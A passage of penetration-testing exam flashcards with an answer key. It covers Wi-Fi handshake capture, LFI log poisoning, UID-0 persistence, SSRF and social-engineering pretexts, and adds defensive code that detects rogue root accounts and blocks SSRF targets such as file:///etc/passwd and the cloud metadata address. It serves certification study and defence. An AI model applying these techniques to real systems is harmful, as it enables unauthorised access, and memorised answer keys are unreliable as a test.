D. Public data breach dumps

A

A. WHOIS domain lookup

81
Q

Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine?

A. Wireshark
B. EAPHammer
C. Kismet
D. Aircrack-ng

A

D. Aircrack-ng

82
Q

A security analyst needs to perform an on-path attack on BLE smart devices. Which of the following tools would be BEST suited to accomplish this task?

A. Wireshark
B. Gattacker
C. tcpdump
D. Netcat

A

B. Gattacker

83
Q

During an assessment, a penetration tester manages to exploit an LFI vulnerability and browse the web log for a target Apache server. Which of the following steps would the penetration tester most likely try NEXT to further exploit the web server? (Choose two.)

A. Cross-site scripting
B. Server-side request forgery
C. SQL injection
D. Log poisoning
E. Cross-site request forgery
F. Command injection

A

D. Log poisoning
F. Command injection

Being able to include the Apache access log through the LFI is the setup for log poisoning: the tester sends a request whose User-Agent (or URL) contains PHP code, the web server writes it into access.log, and the next LFI request that includes the log executes it, which is the command injection step. SSRF, XSS and CSRF are not enabled by reading a log file.

84
Q

A penetration tester opened a reverse shell on a Linux web server and successfully escalated privileges to root. During the engagement, the tester noticed that another user logged in frequently as root to perform work tasks. To avoid disrupting this user’s work, which of the following is the BEST option for the penetration tester to maintain root-level persistence on this server during the test?

A. Add a web shell to the root of the website.
B. Upgrade the reverse shell to a true TTY terminal.
C. Add a new user with ID 0 to the /etc/passwd file.
D. Change the password of the root user and revert after the test.

A

C. Add a new user with ID 0 to the /etc/passwd file.
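An added example, not from the original flashcards, that serves this card and question 79: it parses passwd(5) text to find the extra UID-0 account this persistence technique creates, and parses /var/log/lastlog to answer "who logged in last". The lastlog layout assumed is glibc's struct lastlog on little-endian x86_64 (int32 ll_time, char ll_line[32], char ll_host[256], 292 bytes, one record per UID); other C libraries lay the file out differently. The passwd text and the lastlog bytes are constructed here.

```python
import struct

# glibc struct lastlog, x86_64 little-endian: int32 ll_time, char ll_line[32], char ll_host[256]
LASTLOG_ENTRY = struct.Struct("<i32s256s")

# Constructed /etc/passwd with the attacker's UID-0 account appended
PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
webadmin:x:1000:1000:Web Admin:/home/webadmin:/bin/bash
backup:x:1001:1001::/home/backup:/bin/bash
sysupd:x:0:0:system updater:/tmp:/bin/bash
"""


def parse_passwd(text):
    """Return [(name, uid, shell)] for every entry in passwd(5) text."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        rows.append((fields[0], int(fields[2]), fields[6]))
    return rows


def rogue_uid0_accounts(text):
    """Detection for the technique in the answer: any UID-0 account besides root."""
    return [name for name, uid, _ in parse_passwd(text) if uid == 0 and name != "root"]


def build_lastlog(entries, max_uid):
    """Constructed lastlog file: {uid: (epoch_seconds, tty, host)}; unused UIDs stay zeroed."""
    buf = bytearray(LASTLOG_ENTRY.size * (max_uid + 1))
    for uid, (when, line, host) in entries.items():
        LASTLOG_ENTRY.pack_into(buf, uid * LASTLOG_ENTRY.size, when, line.encode(), host.encode())
    return bytes(buf)


def parse_lastlog(data):
    """{uid: (epoch_seconds, tty, host)} for every UID that has ever logged in."""
    logins = {}
    for uid in range(len(data) // LASTLOG_ENTRY.size):
        when, line, host = LASTLOG_ENTRY.unpack_from(data, uid * LASTLOG_ENTRY.size)
        if when == 0:               # all-zero slot: the UID never logged in
            continue
        logins[uid] = (when, line.rstrip(b"\0").decode(), host.rstrip(b"\0").decode())
    return logins


def last_login(data, passwd_text):
    """The most recent login across all UIDs, resolved to a name via passwd."""
    names = {}
    for name, uid, _ in parse_passwd(passwd_text):
        names.setdefault(uid, name)  # first entry wins: UID 0 resolves to root
    logins = parse_lastlog(data)
    uid = max(logins, key=lambda u: logins[u][0])
    when, line, host = logins[uid]
    return names.get(uid, str(uid)), when, line, host


SAMPLE_LASTLOG = build_lastlog({
    0: (1700000000, "pts/0", "10.1.1.15"),
    1000: (1700003600, "pts/1", "203.0.113.7"),
    1001: (1699990000, "tty1", ""),
}, max_uid=1001)

if __name__ == "__main__":
    print("UID-0 accounts other than root:", rogue_uid0_accounts(PASSWD))
    print("last login:", last_login(SAMPLE_LASTLOG, PASSWD))
```

Because lastlog is indexed by UID, a second UID-0 account shares root's slot: a login as sysupd overwrites root's record and is reported as root. That is one reason the technique is hard to spot in lastlog and why wtmp, auth.log and a passwd diff are the places to confirm it.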

85
Q

A company requires that all hypervisors have the latest available patches installed. Which of the following would BEST explain the reason why this policy is in place?

A. To provide protection against host OS vulnerabilities
B. To reduce the probability of a VM escape attack
C. To fix any misconfigurations of the hypervisor
D. To enable all features of the hypervisor

A

B. To reduce the probability of a VM escape attack

86
Q

A penetration tester uncovers access keys within an organization’s source code management solution. Which of the following would BEST address the issue? (Choose two.)

A. Setting up a secret management solution for all items in the source code management system

B. Implementing role-based access control on the source code management system

C. Configuring multifactor authentication on the source code management system

D. Leveraging a solution to scan for other similar instances in the source code management system

E. Developing a secure software development life cycle process for committing code to the source code management system

F. Creating a trigger that will prevent developers from including passwords in the source code management system

A

A. Setting up a secret management solution for all items in the source code management system
E. Developing a secure software development life cycle process for committing code to the source code management system

87
Q

A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment?

A. The web server is using a WAF.
B. The web server is behind a load balancer.
C. The web server is redirecting the requests.
D. The local antivirus on the web server is rejecting the connection.

A

A. The web server is using a WAF.

88
Q

An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client’s information?

A. Follow the established data retention and destruction process.
B. Report any findings to regulatory oversight groups.
C. Publish the findings after the client reviews the report.
D. Encrypt and store any client information for future analysis.

A

A. Follow the established data retention and destruction process.

Once the deliverables are handed over, keeping client data "for future analysis" extends the tester's exposure and usually breaches the NDA and the contract's data-handling terms; the retention and destruction process defined at scoping governs what is kept, for how long, and how it is destroyed.

89
Q

A penetration tester is required to perform a vulnerability scan that reduces the likelihood of false positives and increases the true positives of the results. Which of the following would MOST likely accomplish this goal?

A. Using OpenVAS in default mode
B. Using Nessus with credentials
C. Using Nmap as the root user
D. Using OWASP ZAP

A

B. Using Nessus with credentials

90
Q

A client evaluating a penetration testing company requests examples of its work. Which of the following represents the BEST course of action for the penetration testers?

A. Redact identifying information and provide a previous customer’s documentation.
B. Allow the client to only view the information while in secure spaces.
C. Determine which reports are no longer under a period of confidentiality.
D. Provide raw output from penetration testing tools.

A

C. Determine which reports are no longer under a period of confidentiality.

91
Q

Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

A. The IP address is wrong.
B. The server is unreachable.
C. The IP address is on the blocklist.
D. The IP address is on the allow list.

A

C. The IP address is on the blocklist.

92
Q

An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next. Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible?

A. A list
B. A tree
C. A dictionary
D. An array

A

C. A dictionary

93
Q

A penetration tester uncovered a flaw in an online banking web application that allows arbitrary requests to other internal network assets through a server-side request forgery. Which of the following would BEST reduce the risk of attack?

A. Implement multifactor authentication on the web application to prevent unauthorized access of the application.

B. Configure a secret management solution to ensure attackers are not able to gain access to confidential information.

C. Ensure a patch management system is in place to ensure the web server system is hardened.

D. Sanitize and validate all input within the web application to prevent internal resources from being accessed.

E. Ensure that enhanced logging is enabled on the web application to detect the attack.

A

D. Sanitize and validate all input within the web application to prevent internal resources from being accessed.
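What "sanitize and validate all input" means for an SSRF sink, as an added example that is not part of the original flashcards: the request target is checked against an allow-list of hosts and schemes before any fetch, and every address the HTTP client actually connects to is checked against the internal ranges (loopback, RFC 1918, link-local including the 169.254.169.254 cloud metadata endpoint). The allowed hosts and the URLs are assumptions for this example.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumed policy: the banking app only ever needs these upstreams over HTTPS
ALLOWED_HOSTS = {"api.partner.example", "rates.bank.example"}
ALLOWED_SCHEMES = {"https"}


def classify_target(url):
    """Return None if the URL may be fetched server-side, otherwise the reason it is refused."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return "unparseable"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return "scheme"            # file://, gopher://, plain http all refused
    host = parts.hostname          # urlsplit lowercases it and strips IPv6 brackets
    if not host:
        return "no-host"
    if parts.username or parts.password:
        return "userinfo"          # https://api.partner.example@10.0.0.5/ confusion
    try:
        ipaddress.ip_address(host)
        return "literal-ip"        # literal addresses are never allowed, only allow-listed names
    except ValueError:
        pass
    if host not in ALLOWED_HOSTS:
        return "host-not-allowed"
    return None


def is_safe_address(ip_text):
    """Apply to every address the HTTP client actually connects to, after DNS resolution and
    after each redirect: refuses loopback, RFC 1918, link-local (metadata), multicast, reserved."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped       # ::ffff:10.0.0.5 is 10.0.0.5
    return ip.is_global and not ip.is_multicast


if __name__ == "__main__":
    for url in ("https://api.partner.example/rates?cur=USD",
                "https://169.254.169.254/latest/meta-data/",
                "https://api.partner.example@10.0.0.5/",
                "file:///etc/passwd"):
        print(url, "->", classify_target(url) or "allowed")
    print("8.8.8.8 safe:", is_safe_address("8.8.8.8"), "| ::1 safe:", is_safe_address("::1"))
```

The host allow-list alone is not enough: an allowed name can resolve to an internal address (DNS rebinding) or redirect to one, which is why is_safe_address runs at connect time, and why the client should either not follow redirects or re-run the check on every hop.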

94
Q

Which of the following actions would BEST explain why a testing team would need to reach out to a customer’s emergency contact during an assessment?

A. To confirm assessment dates
B. To escalate the detection of a prior compromise
C. To submit the weekly status report
D. To announce that testing will begin

A

B. To escalate the detection of a prior compromise

95
Q

An executive needs to use Wi-Fi to connect to the company’s server while traveling. Looking for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is not available where the executive is staying. Which of the following attacks is the executive MOST likely experiencing?

A. Data modification
B. Amplification
C. Captive portal
D. Evil twin

A

D. Evil twin

96
Q

A penetration tester calls an IT employee and pretends to be the financial director of the company. The penetration tester asks the IT employee to reset the financial director’s email password. The penetration tester claims to be at an ongoing, off-site meeting with some investors and needs a presentation file quickly downloaded from the director’s mailbox. Which of following techniques is the penetration tester trying to utilize? (Choose two.)

A. Scarcity
B. Intimidation
C. Authority
D. Consensus
E. Urgency
F. Familiarity

A

C. Authority
E. Urgency